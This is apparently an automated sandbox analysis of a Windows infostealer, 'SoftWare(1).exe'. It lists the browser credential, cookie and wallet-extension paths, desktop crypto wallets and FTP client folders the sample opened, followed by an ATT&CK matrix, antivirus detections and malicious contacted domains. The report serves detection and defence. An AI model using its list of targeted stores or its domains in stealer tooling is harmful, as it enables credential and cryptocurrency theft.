            Source: SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: SoftWare(1).exe, 00000001.00000003.1241714804.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: SoftWare(1).exe, 00000001.00000003.1242293904.000000000051C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
            Source: Yara matchFile source: 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1241714804.0000000000537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1271944869.0000000000537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SoftWare(1).exe PID: 6460, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: SoftWare(1).exe PID: 6460, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation
            1
            DLL Side-Loading
            211
            Process Injection
            21
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Screen Capture
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            211
            Process Injection
            LSASS Memory241
            Security Software Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares41
            Data from Local System
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information
            NTDS1
            Process Discovery
            Distributed Component Object Model2
            Clipboard Data
            Protocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing
            LSA Secrets11
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials33
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SoftWare(1).exe42%VirustotalBrowse
            SoftWare(1).exe39%ReversingLabsWin32.Packed.Generic
            SoftWare(1).exe100%AviraTR/Kryptik.jihlg
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://citydisco.bet:443/gdJIS;x0%Avira URL Cloudsafe
            https://citydisco.bet/gdJISen0%Avira URL Cloudsafe
            https://citydisco.bet:443/gdJIS100%Avira URL Cloudmalware
            https://citydisco.bet/gdJIShima0%Avira URL Cloudsafe
            https://citydisco.bet/gdJISl0%Avira URL Cloudsafe
            https://citydisco.bet/gdJISfbikF0%Avira URL Cloudsafe
            https://citydisco.bet/0%Avira URL Cloudsafe
            https://citydisco.bet/gdJIS20%Avira URL Cloudsafe
            citydisco.bet/gdJIS100%Avira URL Cloudmalware
            https://citydisco.bet/gdJIS100%Avira URL Cloudmalware
            crosshairc.life/dAnjhw100%Avira URL Cloudmalware
            https://citydisco.bet/gdJISc1un0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            citydisco.bet
            188.114.97.3
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              mrodularmall.top/aNzSfalse
                high
                bugildbett.top/bAuzfalse
                  high
                  jowinjoinery.icu/bdWUafalse
                    high
                    legenassedk.top/bdpWOfalse
                      high
                      citydisco.bet/gdJIStrue
                      • Avira URL Cloud: malware
                      unknown
                      htardwarehu.icu/Sbdsafalse
                        high
                        https://citydisco.bet/gdJISfalse
                        • Avira URL Cloud: malware
                        unknown
                        crosshairc.life/dAnjhwtrue
                        • Avira URL Cloud: malware
                        unknown
                        cjlaspcorne.icu/DbIpsfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://citydisco.bet:443/gdJISSoftWare(1).exe, 00000001.00000003.1325657204.0000000000504000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000002.1326136884.0000000000504000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1242293904.0000000000504000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271944869.0000000000504000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1241714804.0000000000504000.00000004.00000020.00020000.00000000.sdmpfalse
